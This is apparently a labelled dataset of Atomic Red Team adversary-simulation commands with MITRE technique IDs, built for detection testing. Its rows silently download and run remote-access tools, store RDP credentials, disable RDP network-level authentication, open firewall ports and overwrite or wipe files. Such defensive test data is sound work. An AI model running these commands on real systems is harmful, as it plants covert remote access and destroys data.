https://download.teamviewer.com/download/TeamViewer_Setup.exe $file1 = ""C:\Users\"" + $env:username + ""\Desktop\TeamViewer_Setup.exe"" Start-Process -Wait $file1 /S; Start-Process 'C:\Program Files (x86)\TeamViewer\TeamViewer.exe'",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1219/T1219.yaml,TeamViewer Files Detected Test on Windows,T1219,"[""T1219""]",windows,0.9,False,"An adversary may attempt to trick the user into downloading teamviewer and using this to maintain access to the machine. Download of TeamViewer installer will be at the destination location when sucessfully executed. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 551979b9f014a15e1e2ce5e1,"$file = 'C:\Program Files (x86)\TeamViewer\uninstall.exe' if(Test-Path $file){ Start-Process $file ""/S"" -ErrorAction Ignore | Out-Null } $file1 = ""C:\Users\"" + $env:username + ""\Desktop\TeamViewer_Setup.exe"" Remove-Item $file1 -ErrorAction Ignore | Out-Null","$file = 'C:\Program Files (x86)\TeamViewer\uninstall.exe' if(Test-Path $file){ Start-Process $file ""/S"" -ErrorAction Ignore | Out-Null } $file1 = ""C:\Users\"" + $env:username + ""\Desktop\TeamViewer_Setup.exe"" Remove-Item $file1 -ErrorAction Ignore | Out-Null",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1219/T1219.yaml,TeamViewer Files Detected Test on Windows,T1219,"[""T1219""]",windows,0.55,True,"An adversary may attempt to trick the user into downloading teamviewer and using this to maintain access to the machine. Download of TeamViewer installer will be at the destination location when sucessfully executed. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2913685f0b057576a6536bb3,"Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\AnyDesk.exe https://download.anydesk.com/AnyDesk.exe $file1 = ""C:\Users\"" + $env:username + ""\Desktop\AnyDesk.exe"" Start-Process $file1 /S;","Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\AnyDesk.exe https://download.anydesk.com/AnyDesk.exe $file1 = ""C:\Users\"" + $env:username + ""\Desktop\AnyDesk.exe"" Start-Process $file1 /S;",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1219/T1219.yaml,AnyDesk Files Detected Test on Windows,T1219,"[""T1219""]",windows,0.9,False,"An adversary may attempt to trick the user into downloading AnyDesk and use to establish C2. Download of AnyDesk installer will be at the destination location and ran when sucessfully executed. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c918f09364f0b74fb3ad9554,"$file1 = ""C:\Users\"" + $env:username + ""\Desktop\AnyDesk.exe"" Remove-Item $file1 -ErrorAction Ignore","$file1 = ""C:\Users\"" + $env:username + ""\Desktop\AnyDesk.exe"" Remove-Item $file1 -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1219/T1219.yaml,AnyDesk Files Detected Test on Windows,T1219,"[""T1219""]",windows,0.55,True,"An adversary may attempt to trick the user into downloading AnyDesk and use to establish C2. Download of AnyDesk installer will be at the destination location and ran when sucessfully executed. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review dc88416975be13d4ed84bd0f,"Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\LogMeInIgnition.msi https://secure.logmein.com/LogMeInIgnition.msi $file1 = ""C:\Users\"" + $env:username + ""\Desktop\LogMeInIgnition.msi"" Start-Process -Wait $file1 /quiet; Start-Process 'C:\Program Files (x86)\LogMeIn Ignition\LMIIgnition.exe' ""/S""","Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\LogMeInIgnition.msi https://secure.logmein.com/LogMeInIgnition.msi $file1 = ""C:\Users\"" + $env:username + ""\Desktop\LogMeInIgnition.msi"" Start-Process -Wait $file1 /quiet; Start-Process 'C:\Program Files (x86)\LogMeIn Ignition\LMIIgnition.exe' ""/S""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1219/T1219.yaml,LogMeIn Files Detected Test on Windows,T1219,"[""T1219""]",windows,0.9,False,"An adversary may attempt to trick the user into downloading LogMeIn and use to establish C2. Download of LogMeIn installer will be at the destination location and ran when sucessfully executed. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review acb9318ed76032cfba68a559,"get-package *'LogMeIn Client'* -ErrorAction Ignore | uninstall-package $file1 = ""C:\Users\"" + $env:username + ""\Desktop\LogMeInIgnition.msi"" Remove-Item $file1 -ErrorAction Ignore","get-package *'LogMeIn Client'* -ErrorAction Ignore | uninstall-package $file1 = ""C:\Users\"" + $env:username + ""\Desktop\LogMeInIgnition.msi"" Remove-Item $file1 -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1219/T1219.yaml,LogMeIn Files Detected Test on Windows,T1219,"[""T1219""]",windows,0.55,True,"An adversary may attempt to trick the user into downloading LogMeIn and use to establish C2. Download of LogMeIn installer will be at the destination location and ran when sucessfully executed. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c0cf02328714ece0d3bc07e1,"try{""$PathToAtomicsFolder/T1219/bin/GoToCleanup.ps1""} catch{}","try{""$PathToAtomicsFolder/T1219/bin/GoToCleanup.ps1""} catch{}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1219/T1219.yaml,GoToAssist Files Detected Test on Windows,T1219,"[""T1219""]",windows,0.55,True,"An adversary may attempt to trick the user into downloading GoToAssist and use to establish C2. Download of GoToAssist installer will be at the destination location and ran when sucessfully executed. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review aa63cc9d4ac8f9771a0b4f38,"$installer = ""C:\Users\$env:username\Downloads\ScreenConnect.msi"" Invoke-WebRequest -OutFile $installer ""https://d1kuyuqowve5id.cloudfront.net/ScreenConnect_25.1.10.9197_Release.msi"" msiexec /i $installer /qn","$installer = ""C:\Users\$env:username\Downloads\ScreenConnect.msi"" Invoke-WebRequest -OutFile $installer ""https://d1kuyuqowve5id.cloudfront.net/ScreenConnect_25.1.10.9197_Release.msi"" msiexec /i $installer /qn",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1219/T1219.yaml,ScreenConnect Application Download and Install on Windows,T1219,"[""T1219""]",windows,0.9,False,"An adversary may attempt to trick the user into downloading ScreenConnect for use as a C2 channel. Download of ScreenConnect installer will be in the Downloads directory. Msiexec will be used to quietly insall ScreenConnect. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 59717df2a89fe97508afa15d,"$installer = ""C:\Users\$env:username\Downloads\ScreenConnect.msi"" msiexec /x $installer /qn","$installer = ""C:\Users\$env:username\Downloads\ScreenConnect.msi"" msiexec /x $installer /qn",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1219/T1219.yaml,ScreenConnect Application Download and Install on Windows,T1219,"[""T1219""]",windows,0.55,True,"An adversary may attempt to trick the user into downloading ScreenConnect for use as a C2 channel. Download of ScreenConnect installer will be in the Downloads directory. Msiexec will be used to quietly insall ScreenConnect. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6280e5736176d5a7ae8d1922,"Start-Process ""#{Ammyy_Admin_Path}""","Start-Process ""#{Ammyy_Admin_Path}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1219/T1219.yaml,Ammyy Admin Software Execution,T1219,"[""T1219""]",windows,0.9,False,"An adversary may attempt to trick the user into downloading Ammyy Admin Remote Desktop Software for use as a C2 channel. Upon successful execution, Ammyy Admin will be executed. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e780848b2fb1ef741689878b,"Stop-Process -Name ""Ammyy"" -force -erroraction silentlycontinue","Stop-Process -Name ""Ammyy"" -force -erroraction silentlycontinue",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1219/T1219.yaml,Ammyy Admin Software Execution,T1219,"[""T1219""]",windows,0.55,True,"An adversary may attempt to trick the user into downloading Ammyy Admin Remote Desktop Software for use as a C2 channel. Upon successful execution, Ammyy Admin will be executed. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 05d7ceffef1bf8a28b3acd55,"Start-Process ""#{RemotePC_Path}""","Start-Process ""#{RemotePC_Path}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1219/T1219.yaml,RemotePC Software Execution,T1219,"[""T1219""]",windows,0.9,False,"An adversary may attempt to trick the user into downloading RemotePC Software for use as a C2 channel. Upon successful execution, RemotePC will be executed. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c310e2863d897f3f95cd2bb1,"Start-Process ""#{NetSupport_Path}"" -ArgumentList ""/S /v/qn""","Start-Process ""#{NetSupport_Path}"" -ArgumentList ""/S /v/qn""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1219/T1219.yaml,NetSupport - RAT Execution,T1219,"[""T1219""]",windows,0.9,False,"A recent trend by threat actors, once a foothold is established, maintain long term persistence using third party remote services such as NetSupport to provide the operator with access to the network using legitimate services. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 71b7c938f6dba4f690a7106d,"Stop-Process -Name ""client32"" -force -erroraction silentlycontinue","Stop-Process -Name ""client32"" -force -erroraction silentlycontinue",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1219/T1219.yaml,NetSupport - RAT Execution,T1219,"[""T1219""]",windows,0.55,True,"A recent trend by threat actors, once a foothold is established, maintain long term persistence using third party remote services such as NetSupport to provide the operator with access to the network using legitimate services. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9765c0f5068a765e67da72ce,"Start-Process -Wait -FilePath ""#{UltraViewer_Path}"" -Argument ""/silent"" -PassThru Start-Process 'C:\Program Files (x86)\UltraViewer\UltraViewer_Desktop.exe'","Start-Process -Wait -FilePath ""#{UltraViewer_Path}"" -Argument ""/silent"" -PassThru Start-Process 'C:\Program Files (x86)\UltraViewer\UltraViewer_Desktop.exe'",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1219/T1219.yaml,UltraViewer - RAT Execution,T1219,"[""T1219""]",windows,0.9,False,"A recent trend by threat actors, once a foothold is established, maintain long term persistence using third party remote services such as UltraViewer to provide the operator with access to the network using legitimate services. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 59286820c650432d99e27909,"Stop-Process -Name ""UltraViewer_Desktop"" -Force -ErrorAction SilentlyContinue","Stop-Process -Name ""UltraViewer_Desktop"" -Force -ErrorAction SilentlyContinue",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1219/T1219.yaml,UltraViewer - RAT Execution,T1219,"[""T1219""]",windows,0.55,True,"A recent trend by threat actors, once a foothold is established, maintain long term persistence using third party remote services such as UltraViewer to provide the operator with access to the network using legitimate services. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 426d8703cf3ae891dd952d79,Start-Process #{UltraVNC_Viewer_Path},Start-Process #{UltraVNC_Viewer_Path},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1219/T1219.yaml,UltraVNC Execution,T1219,"[""T1219""]",windows,0.9,False,"An adversary may attempt to trick the user into downloading UltraVNC for use as a C2 channel. Upon successful execution, UltraVNC will be executed. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review eeb78bb2c5ea03cc03a5eb39,"Stop-Process -Name ""vncviewer"" -force -erroraction silentlycontinue","Stop-Process -Name ""vncviewer"" -force -erroraction silentlycontinue",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1219/T1219.yaml,UltraVNC Execution,T1219,"[""T1219""]",windows,0.55,True,"An adversary may attempt to trick the user into downloading UltraVNC for use as a C2 channel. Upon successful execution, UltraVNC will be executed. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7efc6dc0a64b7da1a6265a42,Start-Process #{MSP360_Connect_Path},Start-Process #{MSP360_Connect_Path},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1219/T1219.yaml,MSP360 Connect Execution,T1219,"[""T1219""]",windows,0.9,False,"An adversary may attempt to trick the user into downloading MSP360 Connect for use as a C2 channel. Upon successful execution, MSP360 Connect will be executed. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review af3b13f9a83b3076143098a3,"Stop-Process -Name ""Connect"" -force -erroraction silentlycontinue","Stop-Process -Name ""Connect"" -force -erroraction silentlycontinue",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1219/T1219.yaml,MSP360 Connect Execution,T1219,"[""T1219""]",windows,0.55,True,"An adversary may attempt to trick the user into downloading MSP360 Connect for use as a C2 channel. Upon successful execution, MSP360 Connect will be executed. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9350da4ec2061519dd3d523c,"$file = Join-Path $env:USERPROFILE ""Desktop\rustdesk-1.2.3-1-x86_64.exe"" Invoke-WebRequest -OutFile $file https://github.com/rustdesk/rustdesk/releases/download/1.2.3-1/rustdesk-1.2.3-1-x86_64.exe Start-Process -FilePath $file ""/S""","$file = Join-Path $env:USERPROFILE ""Desktop\rustdesk-1.2.3-1-x86_64.exe"" Invoke-WebRequest -OutFile $file https://github.com/rustdesk/rustdesk/releases/download/1.2.3-1/rustdesk-1.2.3-1-x86_64.exe Start-Process -FilePath $file ""/S""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1219/T1219.yaml,RustDesk Files Detected Test on Windows,T1219,"[""T1219""]",windows,0.9,False,"An adversary may attempt to trick the user into downloading RustDesk and use this to maintain access to the machine. Download of RustDesk installer will be at the destination location when successfully executed. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fd56f604a0104a9c2aa6f900,"$file = Join-Path $env:USERPROFILE ""Desktop\rustdesk-1.2.3-1-x86_64.exe"" Remove-Item $file1 -ErrorAction Ignore","$file = Join-Path $env:USERPROFILE ""Desktop\rustdesk-1.2.3-1-x86_64.exe"" Remove-Item $file1 -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1219/T1219.yaml,RustDesk Files Detected Test on Windows,T1219,"[""T1219""]",windows,0.55,True,"An adversary may attempt to trick the user into downloading RustDesk and use this to maintain access to the machine. Download of RustDesk installer will be at the destination location when successfully executed. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e1ba175fc74a468ec33350c0,"Start-Process ""#{Splashtop_Path}""","Start-Process ""#{Splashtop_Path}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1219/T1219.yaml,Splashtop Execution,T1219,"[""T1219""]",windows,0.9,False,"An adversary may attempt to trick the user into downloading Splashtop for use as a C2 channel. Upon successful execution, Splashtop will be executed. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8e74b08b37156927d52a720d,"Stop-Process -Name ""strwinclt"" -force -erroraction silentlycontinue","Stop-Process -Name ""strwinclt"" -force -erroraction silentlycontinue",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1219/T1219.yaml,Splashtop Execution,T1219,"[""T1219""]",windows,0.55,True,"An adversary may attempt to trick the user into downloading Splashtop for use as a C2 channel. Upon successful execution, Splashtop will be executed. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8091c7c68e7dc8d07db46eb9,"Start-Process -FilePath ""C:Program Files (x86)\Splashtop\Splashtop Remote\Server\#{srserver_exe}""","Start-Process -FilePath ""C:Program Files (x86)\Splashtop\Splashtop Remote\Server\#{srserver_exe}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1219/T1219.yaml,Splashtop Streamer Execution,T1219,"[""T1219""]",windows,0.9,False,"An adversary may attempt to use Splashtop Streamer to gain unattended remote interactive access. Upon successful execution, Splashtop streamer will be executed.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 319b6c98451ae90d752f07ae,"Start-Process ""shell:AppsFolder\MicrosoftCorporationII.QuickAssist_8wekyb3d8bbwe!App""","Start-Process ""shell:AppsFolder\MicrosoftCorporationII.QuickAssist_8wekyb3d8bbwe!App""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1219/T1219.yaml,Microsoft App Quick Assist Execution,T1219,"[""T1219""]",windows,0.9,False,"An adversary may attempt to trick a user into executing Microsoft Quick Assist Microsoft Store app and connect to the user's machine. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 505e04f94b93a7f8180705b7,Stop-Process -Name quickassist,Stop-Process -Name quickassist,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1219/T1219.yaml,Microsoft App Quick Assist Execution,T1219,"[""T1219""]",windows,0.55,True,"An adversary may attempt to trick a user into executing Microsoft Quick Assist Microsoft Store app and connect to the user's machine. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6c61a05e571f91ebcd3a51b8,ping -n 4 #{ping_target},ping -n 4 #{ping_target},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1016.001/T1016.001.yaml,Check internet connection using ping Windows,T1016.001,"[""T1016.001""]",windows,0.9,False,"Check internet connection using ping on Windows. The default target of the ping is 8.8.8.8 (Google Public DNS). ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 52f1da05b9bf9e884e6ab898,ping -c 4 #{ping_target},ping -c 4 #{ping_target},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1016.001/T1016.001.yaml,"Check internet connection using ping freebsd, linux or macos",T1016.001,"[""T1016.001""]","macos,linux",0.9,False,"Check internet connection using ping on Linux, MACOS. The default target of the ping is 8.8.8.8 (Google Public DNS). ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0d09aa3bca1a3b9b62e72842,Test-NetConnection -ComputerName #{target},Test-NetConnection -ComputerName #{target},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1016.001/T1016.001.yaml,Check internet connection using Test-NetConnection in PowerShell (ICMP-Ping),T1016.001,"[""T1016.001""]",windows,0.9,False,"Check internet connection using PowerShell's Test-NetConnection cmdlet and the ICMP/Ping protocol. The default target is 8.8.8.8 (Google Public DNS). ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 39d7d62f6ff9db188b4e6b73,Test-NetConnection -CommonTCPPort HTTP -ComputerName #{target},Test-NetConnection -CommonTCPPort HTTP -ComputerName #{target},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1016.001/T1016.001.yaml,Check internet connection using Test-NetConnection in PowerShell (TCP-HTTP),T1016.001,"[""T1016.001""]",windows,0.9,False,"Check internet connection using PowerShell's Test-NetConnection cmdlet and the TCP protocol to check for outbound HTTP (Port 80) access. The default target is www.google.com. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9b782517ea6fbf84944b8b3b,Test-NetConnection -CommonTCPPort SMB -ComputerName #{target},Test-NetConnection -CommonTCPPort SMB -ComputerName #{target},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1016.001/T1016.001.yaml,Check internet connection using Test-NetConnection in PowerShell (TCP-SMB),T1016.001,"[""T1016.001""]",windows,0.9,False,"Check internet connection using PowerShell's Test-NetConnection cmdlet and the TCP protocol to check for outbound SMB (Port 445) access. The default target is 8.8.8.8. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a7eb953fc1cc296caca1c20a,"$Server=#{logonserver} $User = Join-Path #{domain} #{username} $Password=""#{password}"" cmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password mstsc /v:$Server echo ""RDP connection established""","$Server=#{logonserver} $User = Join-Path #{domain} #{username} $Password=""#{password}"" cmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password mstsc /v:$Server echo ""RDP connection established""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1021.001/T1021.001.yaml,RDP to DomainController,T1021.001,"[""T1021.001""]",windows,0.9,False,"Attempt an RDP session via Remote Desktop Application to a DomainController. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d72c0995e4f46ca8e0485957,"$p=Tasklist /svc /fi ""IMAGENAME eq mstsc.exe"" /fo csv | convertfrom-csv if(-not ([string]::IsNullOrEmpty($p.PID))) { Stop-Process -Id $p.PID }","$p=Tasklist /svc /fi ""IMAGENAME eq mstsc.exe"" /fo csv | convertfrom-csv if(-not ([string]::IsNullOrEmpty($p.PID))) { Stop-Process -Id $p.PID }",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1021.001/T1021.001.yaml,RDP to DomainController,T1021.001,"[""T1021.001""]",windows,0.55,True,"Attempt an RDP session via Remote Desktop Application to a DomainController. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1dedfaab2c4388e39fcb61d1,"Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name ""PortNumber"" -Value #{NEW_Remote_Port} New-NetFirewallRule -DisplayName 'RDPPORTLatest-TCP-In' -Profile 'Public' -Direction Inbound -Action Allow -Protocol TCP -LocalPort #{NEW_Remote_Port}","Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name ""PortNumber"" -Value #{NEW_Remote_Port} New-NetFirewallRule -DisplayName 'RDPPORTLatest-TCP-In' -Profile 'Public' -Direction Inbound -Action Allow -Protocol TCP -LocalPort #{NEW_Remote_Port}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1021.001/T1021.001.yaml,Changing RDP Port to Non Standard Port via Powershell,T1021.001,"[""T1021.001""]",windows,0.9,False,"Changing RDP Port to Non Standard Port via Powershell ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 69477ab435c1fc1091aba8bc,"Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name ""PortNumber"" -Value #{OLD_Remote_Port} Remove-NetFirewallRule -DisplayName ""RDPPORTLatest-TCP-In"" -ErrorAction Ignore Get-Service TermService | Restart-Service -Force -ErrorAction Ignore","Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name ""PortNumber"" -Value #{OLD_Remote_Port} Remove-NetFirewallRule -DisplayName ""RDPPORTLatest-TCP-In"" -ErrorAction Ignore Get-Service TermService | Restart-Service -Force -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1021.001/T1021.001.yaml,Changing RDP Port to Non Standard Port via Powershell,T1021.001,"[""T1021.001""]",windows,0.55,True,"Changing RDP Port to Non Standard Port via Powershell ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0623fcd1f1c2431821e4fda1,"reg add ""HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} /f netsh advfirewall firewall add rule name=""RDPPORTLatest-TCP-In"" dir=in action=allow protocol=TCP localport=#{NEW_Remote_Port}","reg add ""HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} /f netsh advfirewall firewall add rule name=""RDPPORTLatest-TCP-In"" dir=in action=allow protocol=TCP localport=#{NEW_Remote_Port}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1021.001/T1021.001.yaml,Changing RDP Port to Non Standard Port via Command_Prompt,T1021.001,"[""T1021.001""]",windows,0.9,False,"Changing RDP Port to Non Standard Port via Command_Prompt ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4b5a6c6f91e0dc80341c1b13,"reg add ""HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"" /v PortNumber /t REG_DWORD /d #{OLD_Remote_Port} /f >nul 2>&1 netsh advfirewall firewall delete rule name=""RDPPORTLatest-TCP-In"" >nul 2>&1 net stop TermService /y >nul 2>&1 net start TermService >nul 2>&1","reg add ""HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"" /v PortNumber /t REG_DWORD /d #{OLD_Remote_Port} /f >nul 2>&1 netsh advfirewall firewall delete rule name=""RDPPORTLatest-TCP-In"" >nul 2>&1 net stop TermService /y >nul 2>&1 net start TermService >nul 2>&1",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1021.001/T1021.001.yaml,Changing RDP Port to Non Standard Port via Command_Prompt,T1021.001,"[""T1021.001""]",windows,0.55,True,"Changing RDP Port to Non Standard Port via Command_Prompt ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 95a76bb24bb3d09887381119,"reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"" /v UserAuthentication /d 0 /t REG_DWORD /f","reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"" /v UserAuthentication /d 0 /t REG_DWORD /f",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1021.001/T1021.001.yaml,Disable NLA for RDP via Command Prompt,T1021.001,"[""T1021.001""]",windows,0.9,False,"Disables network-level authentication (NLA) for RDP by changing a registry key via Command Prompt Disabling NLA for RDP can allow remote user interaction with the Windows sign-in screen prior to authentication. According to Microsoft, Flax Typhoon actors used this technique implementation to achieve persistence on victim systems: https://www.microsoft.com/en-us/security/blog/2023/08/24/flax-typhoon-using-legitimate-software-to-quietly-access-taiwanese-organizations/ See also: https://github.com/",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 43b3b9a37bc80466e9d6c6a6,"reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"" /v UserAuthentication /d #{Default_UserAuthentication} /t REG_DWORD -f >nul 2>&1","reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"" /v UserAuthentication /d #{Default_UserAuthentication} /t REG_DWORD -f >nul 2>&1",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1021.001/T1021.001.yaml,Disable NLA for RDP via Command Prompt,T1021.001,"[""T1021.001""]",windows,0.55,True,"Disables network-level authentication (NLA) for RDP by changing a registry key via Command Prompt Disabling NLA for RDP can allow remote user interaction with the Windows sign-in screen prior to authentication. According to Microsoft, Flax Typhoon actors used this technique implementation to achieve persistence on victim systems: https://www.microsoft.com/en-us/security/blog/2023/08/24/flax-typhoon-using-legitimate-software-to-quietly-access-taiwanese-organizations/ See also: https://github.com/",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 23a5728995475088b0b480d6,"if (-not (Test-Path ""#{file_to_delete}"")) { New-Item ""#{file_to_delete}"" -Force } & ""#{sdelete_exe}"" -accepteula ""#{file_to_delete}""","if (-not (Test-Path ""#{file_to_delete}"")) { New-Item ""#{file_to_delete}"" -Force } & ""#{sdelete_exe}"" -accepteula ""#{file_to_delete}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1485/T1485.yaml,Windows - Overwrite file with SysInternals SDelete,T1485,"[""T1485""]",windows,0.9,False,"Overwrites and deletes a file using SysInternals SDelete. Upon successful execution, ""Files deleted: 1"" will be displayed in the powershell session along with other information about the file that was deleted. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c31b236c404d5f1e70484a04,dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk '{print $5}') iflag=count_bytes,dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk '{print $5}') iflag=count_bytes,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1485/T1485.yaml,FreeBSD/macOS/Linux - Overwrite file with DD,T1485,"[""T1485""]","linux,macos",0.9,False,"Overwrites and deletes a file using DD. To stop the test, break the command with CTRL/CMD+C. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 83518c0519e99c1e86263eb9,cipher.exe /w:C:,cipher.exe /w:C:,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1485/T1485.yaml,Overwrite deleted data on C 